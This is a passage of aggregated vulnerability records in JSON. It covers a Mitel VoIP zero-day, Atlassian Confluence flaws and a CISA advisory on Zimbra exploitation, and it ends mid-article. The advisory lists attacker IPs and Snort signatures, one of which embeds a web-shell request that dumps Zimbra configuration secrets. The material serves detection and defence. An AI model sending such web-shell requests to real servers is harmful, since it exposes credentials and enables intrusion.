remediation script that it shared with customers. 
It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming.\n\n\"A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances \u2013 SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance,\" the company [noted](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) in an advisory.\n\nThe exploit entailed two [HTTP GET requests](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>) \u2014 which are used to retrieve a specific resource from a server \u2014 to trigger remote code execution by fetching rogue commands from the attacker-controlled infrastructure.\n\nIn the incident investigated by CrowdStrike, the attacker is said to have used the exploit to create a reverse shell, utilizing it to launch a web shell (\"pdf_import.php\") on the VoIP appliance and download the open source [Chisel](<https://github.com/jpillora/chisel>) proxy tool.\n\nThe binary was then executed, but only after renaming it to \"[memdump](<https://www.kali.org/tools/memdump/>)\" in an attempt to fly under the radar and use the utility as a \"reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device.\" But subsequent detection of the activity halted their progress and prevented them from moving laterally across the network.\n\nThe disclosure arrives less than two weeks after German penetration testing firm SySS [revealed](<https://thehackernews.com/2022/06/researchers-disclose-rooting-backdoor.html>) two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could have allowed an attacker to gain root privileges on the devices.\n\n\"Timely patching is critical to protect perimeter devices. 
However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,\" CrowdStrike researcher Patrick Bennett said.\n\n\"Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via 'one hop' from the compromised device.\"\n\nUpdate: According to security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1540309810176217088>), there are nearly 21,500 publicly accessible Mitel devices online, with the majority located in the U.S., followed by the U.K., Canada, France, and Australia.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T12:58:00", "type": "thn", "title": "Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499", "CVE-2022-29854", "CVE-2022-29855"], "modified": "2022-06-27T05:55:33", "id": "THN:DE707FE81271E115F82D9DA443CC56C8", "href": "https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T03:59:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgwDyGaM4FdPe7m1y8beGIF9lst24L3fkt-FcrOap-X3fu09AhyO7t96mPZ_Q18jTQk8eFV8Z51Gfcp2Ryc_rvunTZbKZlMR3V32iWdinfxc04Gi4-7Y00aCE5kd4OLdU_CVTDy9G5mG9nh8rknBtsXbXwgwYWh-zeyeSlzCme-VBas1mHIY53IAJWH/s728-e100/Atlassian-Confluence-Vulnerability.jpg>)\n\nAtlassian has rolled out fixes to remediate a critical security vulnerability pertaining to the use of hard-coded credentials affecting [the Questions For Confluence](<https://marketplace.atlassian.com/apps/1211644/questions-for-confluence>) app for Confluence Server and Confluence Data Center.\n\nThe flaw, tracked as **CVE-2022-26138**, arises when the app in question is enabled on either of two services, causing it to create a Confluence user account with the username \"disabledsystemuser.\"\n\nWhile this account, Atlassian says, is to help administrators migrate data from the app to Confluence Cloud, it's also created with a hard-coded password, effectively allowing viewing and editing all non-restricted pages within Confluence by default.\n\n\"A remote, unauthenticated attacker with knowledge of the hard-coded password could exploit this to log into Confluence and access any pages the [confluence-users group](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>) has access to,\" the company [said](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) in an advisory, adding that \"the hard-coded password is trivial to obtain after downloading and reviewing affected versions of the app.\"\n\nQuestions for Confluence 
versions 2.7.34, 2.7.35, and 3.0.2 are impacted by the flaw, with fixes available in versions 2.7.38 and 3.0.5. Alternatively, users can [disable or delete](<https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html>) the disabledsystemuser account.\n\nWhile Atlassian has pointed out that there's no evidence of active exploitation of the flaw, users can look for indicators of compromise by checking the last authentication time for the account. \"If the last authentication time for disabledsystemuser is null, that means the account exists but no one has ever logged into it,\" it said.\n\nSeparately, the Australian software company also moved to patch a pair of critical flaws, which it calls servlet filter dispatcher vulnerabilities, impacting multiple products -\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Fisheye and Crucible\n * Jira Server and Data Center, and\n * Jira Service Management Server and Data Center\n\nSuccessful exploitation of the bugs, tracked as CVE-2022-26136 and CVE-2022-26137, could enable an unauthenticated, remote attacker to bypass authentication used by third-party apps, execute arbitrary JavaScript code, and circumvent the cross-origin resource sharing ([CORS](<https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS>)) browser mechanism by sending a specially crafted HTTP request.\n\n\"Atlassian has released updates that fix the root cause of this vulnerability, but has not exhaustively enumerated all potential consequences of this vulnerability,\" the company [cautioned](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>) in its advisory regarding CVE-2022-26137.\n\n**_Update:_** Atlassian on Thursday warned that the critical Questions For Confluence app vulnerability is likely to be exploited in the wild after the hard-coded password became publicly 
known, urging its customers to remediate the issue as soon as possible.\n\n\"An external party has discovered and publicly disclosed the hardcoded password on Twitter,\" the company said. \"It is important to remediate this vulnerability on affected systems immediately.\"\n\nThe software firm also emphasized that uninstalling the Questions for Confluence app does not address the vulnerability, as the created account does not get automatically removed after the app has been uninstalled. It's instead recommending that users either update to the latest version of the app or manually disable or delete the account.\n", "cvss3": {}, "published": "2022-07-21T08:41:00", "type": "thn", "title": "Atlassian Rolls Out Security Patch for Critical Confluence Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-22T02:37:51", "id": "THN:F050B7CE35D52E330ED83AACF83D6B29", "href": "https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2023-06-06T18:28:22", "description": "### Summary\n\nActions for ZCS administrators to take today to mitigate malicious cyber activity:\n\n\u2022 Patch all systems and prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Deploy detection signatures and hunt for indicators of compromise (IOCs). 
\n\u2022 If ZCS was compromised, remediate malicious activity.\n\n_Updated November 10, 2022: This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) with contributions by the Federal Bureau of Investigation (FBI)._\n\nCISA and the MS-ISAC are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. CVEs currently being exploited against ZCS include:\n\n * CVE-2022-24682\n * CVE-2022-27924\n * CVE-2022-27925 chained with CVE-2022-37042\n * CVE-2022-30333\n\nCyber threat actors may be targeting unpatched ZCS instances in both government and private sector networks. CISA and the MS-ISAC strongly urge users and administrators to apply the guidance in the Recommendations section of this CSA to help secure their organization\u2019s systems against malicious cyber activity. CISA and the MS-ISAC encourage organizations who did not immediately update their ZCS instances upon patch release, or whose ZCS instances were exposed to the internet, to assume compromise and hunt for malicious activity using the third-party detection signatures in the Detection Methods section of this CSA. Organizations that detect potential compromise should apply the steps in the Incident Response section of this CSA.\n\n**_Updated November 10_**, **_2022_**:\n\nThis CSA has been updated with additional IOCs. 
For a downloadable copy of the IOCs, see the following Malware Analysis Reports (MARs):\n\n * [MAR-10400779-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270a>)\n * [MAR-10400779-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270b>)\n * [MAR-10401765-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270c>)\n * [MAR-10398871-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-292a>)\n * _New, November 10, 2022:_ [MAR-10410305-1.v1 JSP Webshell](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-314a>)\n\n**_Update End_**\n\n### Technical Details\n\n#### CVE-2022-27924\n\nCVE-2022-27924 is a high-severity vulnerability enabling an unauthenticated malicious actor to inject arbitrary memcache commands into a targeted ZCS instance and cause an overwrite of arbitrary cached entries. The actor can then steal ZCS email account credentials in cleartext form without any user interaction. With valid email account credentials in an organization not enforcing multifactor authentication (MFA), a malicious actor can use spear phishing, social engineering, and business email compromise (BEC) attacks against the compromised organization. Additionally, malicious actors could use the valid account credentials to open webshells and maintain persistent access.\n\nOn March 11, 2022, researchers from SonarSource announced the discovery of this ZCS vulnerability. Zimbra issued fixes for releases 8.8.15 and 9.0 on May 10, 2022. Based on evidence of active exploitation, CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 4, 2022. 
Due to ease of exploitation, CISA and the MS-ISAC expect to see widespread exploitation of unpatched ZCS instances in government and private networks.\n\n#### CVE-2022-27925 and CVE-2022-37042\n\nCVE-2022-27925 is a high-severity vulnerability in ZCS releases 8.8.15 and 9.0, which have mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user has the ability to upload arbitrary files to the system, leading to directory traversal.[[1](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)] On August 10, 2022, researchers from Volexity reported widespread exploitation\u2014against over 1,000 ZCS instances\u2014of CVE-2022-27925 in conjunction with CVE-2022-37042.[[2](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)] CISA added both CVEs to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 11, 2022.\n\nCVE-2022-37042 is an authentication bypass vulnerability that affects ZCS releases 8.8.15 and 9.0. CVE-2022-37042 could allow an unauthenticated malicious actor access to a vulnerable ZCS instance. According to Zimbra, CVE-2022-37042 is found in the MailboxImportServlet function.[[3](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)][[4](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)] Zimbra issued fixes in late July 2022.\n\n#### CVE-2022-30333\n\nCVE-2022-30333 is a high-severity directory traversal vulnerability in RARLAB UnRAR on Linux and UNIX allowing a malicious actor to write to files during an extract (unpack) operation. A malicious actor can exploit CVE-2022-30333 against a ZCS server by sending an email with a malicious RAR file. 
Upon email receipt, the ZCS server would automatically extract the RAR file to check for spam or malware.[[5](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>)] Any ZCS instance with unrar installed is vulnerable to CVE-2022-30333.\n\nResearchers from SonarSource shared details about this vulnerability in June 2022.[[6](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Zimbra made configuration changes to use the 7zip program instead of unrar.[[7](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)] CISA added CVE-2022-30333 to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 9, 2022. Based on industry reporting, a malicious cyber actor is selling a cross-site scripting (XSS) exploit kit for the ZCS vulnerability CVE-2022-30333. A Metasploit module is also available that creates a RAR file that can be emailed to a ZCS server to exploit CVE-2022-30333.[[8](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)]\n\n#### CVE-2022-24682\n\nCVE-2022-24682 is a medium-severity vulnerability that impacts ZCS webmail clients running releases before 8.8.15 patch 30 (update 1), which contain a cross-site scripting (XSS) vulnerability allowing malicious actors to steal session cookie files. 
Researchers from Volexity shared this vulnerability on February 3, 2022,[[9](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)] and Zimbra issued a fix on February 4, 2022.[[10](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)] CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on February 25, 2022.\n\n### Detection Methods\n\nNote: CISA and the MS-ISAC will update this section with additional IOCs and signatures as further information becomes available.\n\nCISA recommends that administrators, especially at organizations that did not immediately update their ZCS instances upon patch release, hunt for malicious activity using the following third-party detection signatures:\n\n * _**Updated September 27**_, _**2022**_: Hunt for IOCs including:\n\nIP Address | Note\n---|---\n62.113.255[.]70 | New September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042\n185.112.83[.]77 | New September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042\n207.148.76[.]235 | A Cobalt Strike command and control (C2) domain\n209.141.56[.]190 | New September 27, 2022\n\n * _**Updated August 23**_, _**2022**_: Deploy Snort signatures to detect malicious activity:\n\nalert tcp any any -> any any (msg:\"ZIMBRA: HTTP POST content data '.jsp' file'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"file|3a|\"; nocase; http_client_body; content:\"|2e|jsp\"; http_client_body; fast_pattern; classtype:http-content; reference:cve,2022-30333;)\n\nalert tcp any any -> any any 
(msg:\"ZIMBRA: Client HTTP Header 'QIHU 360SE'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"QIHU|20|360SE\"; nocase; http_header; fast_pattern; classtype:http-header; reference:cve,2022-30333;)\n\nalert tcp any any -> any any (msg:\"ZIMBRA:HTTP GET URI for Zimbra Local Config\"; sid:x; flow:established,to_server; content:\"/public/jsp/runas.jsp?pwd=zim&i=/opt/zimbra/bin/zmlocalconfig|3a|-s\"; http_uri; classtype:http-uri; reference:cve,2022-30333;) \n\n * Deploy third-party YARA rules to detect malicious activity: \n * See [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n### Mitigations\n\nCISA and the MS-ISAC recommend organizations upgrade to the latest ZCS releases as noted on [Zimbra Security \u2013 News & Alerts](<https://wiki.zimbra.com/wiki/Security_Center>) and [Zimbra Security Advisories](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>).\n\nSee [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) for mitigation steps.\n\nAdditionally, CISA and the MS-ISAC recommend organizations apply the following best practices to reduce risk of compromise:\n\n * **Maintain and test** an incident response plan.\n * **Ensure your organization has a vulnerability management program** in place and that it prioritizes patch management and vulnerability scanning of [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). 
**Note:** CISA\u2019s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations: [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>). \n * **Properly configure and secure** internet-facing network devices. \n * Do not expose management interfaces to the internet.\n * Disable unused or unnecessary network ports and protocols.\n * Disable/remove unused network services and devices.\n * **Adopt [zero-trust principles and architecture](<https://www.cisa.gov/blog/2021/09/07/no-trust-no-problem-maturing-towards-zero-trust-architectures>)**, including: \n * Micro-segmenting networks and functions to limit or block lateral movement.\n * Enforcing phishing-resistant multifactor authentication (MFA) for all users and virtual private network (VPN) connections.\n * Restricting access to trusted devices and users on the networks.\n\n### INCIDENT RESPONSE\n\nIf an organization\u2019s system has been compromised by active or recently active threat actors in their environment, CISA and the MS-ISAC recommend the following initial steps:\n\n 1. **Collect and review artifacts**, such as running processes/services, unusual authentications, and recent network connections.\n 2. **Quarantine or take offline potentially affected hosts**.\n 3. **Reimage compromised hosts**.\n 4. **Provision new account credentials**.\n 5. **Report the compromise** to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870). 
SLTT government entities can also report to the MS-ISAC ([SOC@cisecurity.org](<mailto:SOC@cisecurity.org>) or 866-787-4722).\n\nSee the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and the MS-ISAC also encourage government network administrators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide detailed operational procedures for planning and conducting cybersecurity incident and vulnerability response activities.\n\n### ACKNOWLEDGEMENTS\n\nCISA and the MS-ISAC would like to thank Volexity and Secureworks for their contributions to this advisory.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA and the MS-ISAC do not provide any warranties of any kind regarding this information. CISA and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### References\n\n[[1] CVE-2022-27925 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)\n\n[[2] Mass exploitation of (un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n[[3] CVE-2022-37042 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)\n\n[[4] Authentication bypass in MailboxImportServlet vulnerability](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)\n\n[[5] CVE-2022-30333 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>)\n\n[[6] UnRAR vulnerability exploited in the wild, likely against Zimbra servers](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)\n\n[[7] Zimbra Collaboration Kepler 9.0.0 patch 25 GA release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)\n\n[[8] Zimbra UnRAR path traversal](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)\n\n[[9] Operation EmailThief: Active exploitation of zero-day XSS vulnerability in Zimbra](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)\n\n[[10] Hotfix available 5 Feb for zero-day exploit vulnerability in Zimbra 8.8.15](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)\n\n### Revisions\n\n * August 16, 2022: Initial Version\n * August 22, 2022: Added Snort Signatures\n * August 23, 2022: Updated Detection Methods Snort Signatures\n * October 19, 2022: Added new Malware Analysis Report\n * November 10, 2022: Added new Malware Analysis Report\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-27T12:00:00", "type": "ics", "title": "Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24682", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-3033", "CVE-2022-30333", "CVE-2022-37042", "CVE-2023-27350"], "modified": "2023-01-27T12:00:00", "id": "AA22-228A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-08-17T05:59:07", "description": "A Directory Traversal vulnerability exists in Zimbra Collaboration. 
Successful exploitation of this vulnerability could allow a remote attacker to disclose or access arbitrary files on the vulnerable server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration Directory Traversal (CVE-2022-27925; CVE-2022-37042)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-16T00:00:00", "id": "CPAI-2022-0515", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T09:59:56", "description": "A command injection vulnerability exists in Mitel MiVoice Connect. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "checkpoint_advisories", "title": "Mitel MiVoice Connect Command Injection (CVE-2022-29499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CPAI-2022-0331", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T23:29:47", "description": "A hardcoded credentials vulnerability exists in Atlassian Questions for Confluence App. 
Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Questions for Confluence App Hardcoded Credentials (CVE-2022-26138)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-10T00:00:00", "id": "CPAI-2022-0467", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-20T19:05:33", "description": "A CRLF injection vulnerability exists in Zimbra Collaboration. 
Successful exploitation of this vulnerability could allow a remote attacker to damage users' systems.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-20T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration CRLF Injection (CVE-2022-27924)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-07-20T00:00:00", "id": "CPAI-2022-0357", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-10-04T10:03:06", "description": "A remote code execution vulnerability exists in Atlassian Confluence. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-12T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-08-18T00:02:01", "description": "Researchers at [Volexity](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) have discovered that a known vulnerability has been used in a large scale attack against Zimbra Collaboration Suite (ZCS) email servers. But the vulnerability was supposed to be hard to exploit since it required authentication. So they decided to dig deeper.\n\n## An incomplete fix\n\nZimbra is a brand owned by 